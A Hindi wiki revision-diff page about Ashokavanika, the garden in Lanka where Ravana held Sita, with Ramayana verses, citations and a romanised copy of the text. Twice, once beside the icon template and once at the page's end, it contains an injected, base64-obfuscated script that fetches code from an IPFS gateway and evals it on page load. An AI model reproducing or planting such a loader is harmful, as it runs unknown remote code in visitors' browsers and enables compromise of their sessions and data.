Difference between revisions of "अशोकवनिका"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''अशोकवनिका''' को [[अशोकवाटिका]] भी कहा जाता है। [[वाल्मीकि]] की [[रामायण]] के अनुसार [[लंका]] में स्थित एक सुंदर उद्यान था, जिसमें [[रावण]] ने [[सीता]] को बंदी बनाकर रखा था- 'अशोकवनिकामध्ये मैथिली नियतामिति, तत्रेय रक्ष्यतां गूढं युष्माभिः परिवारिता'<ref>अरण्य काण्ड 56,30</ref>
+
'''अशोकवनिका''' को [[अशोकवाटिका]] भी कहा जाता है। [[रामायण|वाल्मीकि रामायण]] के अनुसार [[लंका]] में स्थित एक सुंदर उद्यान था जिसमें [[रावण]] ने [[सीता]] को बंदी बनाकर रखा था-  
[[अरण्य काण्ड वा. रा.|अरण्य काण्ड]] 55 से ज्ञात होता है कि रावण पहले सीता को अपने राजप्रासाद में लाया था और वहीं रखना चाहता था किंतु सीता की अडिगता तथा अपने प्रति उसका तिरस्कार भाव देखकर उसे धीर-धीरे मना लेने के लिये प्रासाद से कुछ दूर अशोकवनिका में कैद कर दिया था। [[सुन्दर काण्ड वा. रा.|सुन्दर काण्ड]] 18 में अशोकवनिका का सुंदर वर्णन है- 'तां नगैर्विविधैर्जुष्टां सर्व्पुष्पफलोपगैः, वृतां पुष्करिणीभिश्च नानापुष्पोपशोभिताम्। वीथीः सम्प्रेक्षमाणश्च मणिकांचनातोरणाम् नानामृगमणाकीर्णा फलैः प्रपतितैवृताम्, अशोकवनिकामेव प्राविवश्त्सततद्रुमाम्,<ref>[[सुन्दर काण्ड वा. रा.|सुन्दर काण्ड]], 18, 6-9</ref>। अध्यात्मरामायण में भी सीता का अशोकवनिका या अशोकविपिन में रखे जाने का उल्लेख है- 'स्वांतःपुरे रहस्ये तामशोकविपिने क्षिपत्, राक्ष्सीभिः परिवृतां मातृबुद्धयांवपालयत्' <ref>अरण्य काण्ड, 7,65</ref>वाल्मीकि ने सुंदरकाण्ड 3, 71 में [[हनुमान]] द्वारा अशोकवनिका के उजाड़े जाने का वर्णन किया है- 'इतिनिशिचत्य मनसा वृक्षखंडान्महाबलः, उत्पाट्याशोकवनिकां निवृक्षामकरोत् क्षणात्'<ref>सुंदरकाण्ड 3,71</ref>। अशोकवनिका में हनुमान ने [[साल]], अशोक, चम्पक, [[उद्दालक]], [[नाग]], आम्र तथा कपिमुख नामक वृक्षों को देखा था। उन्होंने एक [[शीशम]] के वृक्ष पर चढ कर प्रथम बार सीता को देखा था- 'सुपुष्पिताग्रांरुचिरांस्तरुणांकुरपल्लवांन्, तामारूह्य महावेकः शिशपापर्णसंवृताम्-'<ref>सुंदरकाण्ड 14,41</ref>इसी वृक्ष के नीचे उन्होंने सीता से भेंट की थी।<ref>पुस्तक- ऐतिहासिक स्थानावली | लेखक- विजयेन्द्र कुमार माथुर | पृष्ठ संख्या- 49 </ref>
+
<poem>'अशोकवनिकामध्ये मैथिलीं नीयतामिति,  
 +
तत्रेयं रक्ष्यतां गूढं युष्माभि: परिवारिता।'<ref>[[अरण्य काण्ड वा. रा.]] 56, 30</ref></poem>
 +
[[अरण्य काण्ड वा. रा.|अरण्य काण्ड]]<ref>अरण्य काण्ड वा. रा. 55</ref> से ज्ञात होता है कि रावण पहले सीता को अपने राज प्रासाद में लाया था और वहीं रखना चाहता था। किंतु सीता की अडिगता तथा अपने प्रति उसका तिरस्कारभाव देखकर उसे धीरे-धीरे मना लेने के लिए प्रासाद से कुछ दूर अशोकवाटिका में कैद कर दिया था। सुंदर कांड<ref>सुंदर कांड 18</ref> में अशोकवाटिका का सुंदर वर्णन है-  
 +
<poem>'तां नगैर्विविधैर्जुष्टां सर्वपुष्पफलोपगै:,  
 +
वृतां पुष्करिणीभिश्च नानापुष्पोपशोभिताम्।  
 +
सदा मत्तैश्च विहगैर्विचित्रां परमाद्भुतै: ईहामृगैश्च विविधैर्वृता दृष्टिमनोहरै:।
 +
वीथी: संप्रेक्षमाणश्च मणिकांचनातोरणाम् नानामृगगणाकीर्णां फलै: प्रपतितैर्वृताम्,  
 +
अशोकवनिकामेव प्राविवशत्संततद्रुमाम्।'<ref>सुंदर कांड 18, 6-9</ref></poem>
 +
[[अध्यात्म रामायण]] में भी [[सीता]] का अशोकवनिका या अशोकविपिन में रखे जाने का उल्लेख है-  
 +
<poem>'स्वान्त:पुरे रहस्ये तामशोकविपिने क्षिपत्,
 +
राक्षसीभि: परिवृतां मातृबुद्धयान्वपालयत्।'<ref>[[अरण्य काण्ड वा. रा.]] 7, 65</ref></poem>
 +
[[वाल्मीकि]] ने सुंदर कांड<ref>सुंदर कांड 3,71</ref> में [[हनुमान]] द्वारा अशोकवाटिका के उजाड़े जाने का वर्णन है-  
 +
<poem>'इतिनिश्चित्य मनसा वृक्षखंडान्महाबल:,  
 +
उत्पाट्याशोकवनिकां निवृक्षामकरोत् क्षणात्।'<ref>सुंदर कांड 3, 71</ref></poem>
 +
अशोकवाटिका में [[हनुमान]] ने साल, [[अशोक वृक्ष|अशोक]], चंपक, उद्दालक, नांग, आम्र तथा कपिमुख नामक वृक्षों को देखा था। उन्होंने एक शीशम के वृक्ष पर चढ़ कर प्रथम बार सीता को देखा था-
 +
<poem>'सुपुष्पिताग्रानरुचिरांस्तरुणांकुरपल्लवान्,  
 +
तामारुह्य महावेग: शिंशपापर्णसंवृताम्।<ref>सुंदर कांड 14, 14</ref></poem>
 +
इसी वृक्ष के नीचे उन्होंने सीता से भेंट की थी।<ref>देखें अध्यात्म रामायण सुंदर कांड 3, 14- 'शनैरशोक वनिकां विचिन्वञ् शिंशपातरुम्, अद्राक्षं जानकीमत्र शोचयन्तीं दु:खसंप्लुताम्' </ref><ref>पुस्तक- ऐतिहासिक स्थानावली | लेखक- विजयेन्द्र कुमार माथुर | पृष्ठ संख्या- 49 </ref>
  
 
{{point}} अधिक जानकारी के लिए देखें:- [[अशोकवाटिका]]
 
{{point}} अधिक जानकारी के लिए देखें:- [[अशोकवाटिका]]
 
  
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==

Revision as of 09:40, 4 May 2018

ashokavanika ko ashokavatika bhi kaha jata hai. valmiki ramayan ke anusar lanka mean sthit ek suandar udyan tha jisamean ravan ne sita ko bandi banakar rakha tha-

'ashokavanikamadhye maithilian niyatamiti,
tatreyan rakshyataan goodhan yushmabhi: parivarita.'[1]

arany kand[2] se jnat hota hai ki ravan pahale sita ko apane raj prasad mean laya tha aur vahian rakhana chahata tha. kiantu sita ki adigata tatha apane prati usaka tiraskarabhav dekhakar use dhire-dhire mana lene ke lie prasad se kuchh door ashokavatika mean kaid kar diya tha. suandar kaand[3] mean ashokavatika ka suandar varnan hai-

'taan nagairvividhairjushtaan sarvapushpaphalopagai:,
vritaan pushkarinibhishch nanapushpopashobhitamh.
sada mattaishch vihagairvichitraan paramadbhutai: eehamrigaishch vividhairvrita drishtimanoharai:.
vithi: sanprekshamanashch manikaanchanatoranamh nanamrigaganakirnaan phalai: prapatitairvritamh,
ashokavanikamev pravivashatsantatadrumamh.'[4]

adhyatm ramayan mean bhi sita ka ashokavanika ya ashokavipin mean rakhe jane ka ullekh hai-

'svant:pure rahasye tamashokavipine kshipath,
rakshasibhi: parivritaan matribuddhayanvapalayath.'[5]

valmiki ne suandar kaand[6] mean hanuman dvara ashokavatika ke uja de jane ka varnan hai-

'itinishchity manasa vrikshakhandanmahabal:,
utpatyashokavanikaan nivrikshamakaroth kshanath.'[7]

ashokavatika mean hanuman ne sal, ashok, chanpak, uddalak, naang, amr tatha kapimukh namak vrikshoan ko dekha tha. unhoanne ek shisham ke vriksh par chadh kar pratham bar sita ko dekha tha-

'supushpitagranaruchiraanstarunaankurapallavanh,
tamaruhy mahaveg: shianshapaparnasanvritamh.[8]

isi vriksh ke niche unhoanne sita se bheant ki thi.[9][10]

{{#icon: Redirect-01.gif|dhyan dean}}<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> adhik janakari ke lie dekhean:- ashokavatika

tika tippani aur sandarbh

  1. arany kand va. ra. 56, 30
  2. arany kand va. ra. 55
  3. suandar kaand 18
  4. suandar kaand 18, 6-9
  5. arany kand va. ra. 7, 65
  6. suandar kaand 3,71
  7. suandar kaand 3, 71
  8. suandar kaand 14, 14
  9. dekhean adhyatm ramayan suandar kaand 3, 14- 'shanairashok vanikaan vichinvanh shianshapatarumh, adrakshan janakimatr shochayantian du:khasanplutamh'
  10. pustak- aitihasik sthanavali | lekhak- vijayendr kumar mathur | prishth sankhya- 49

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>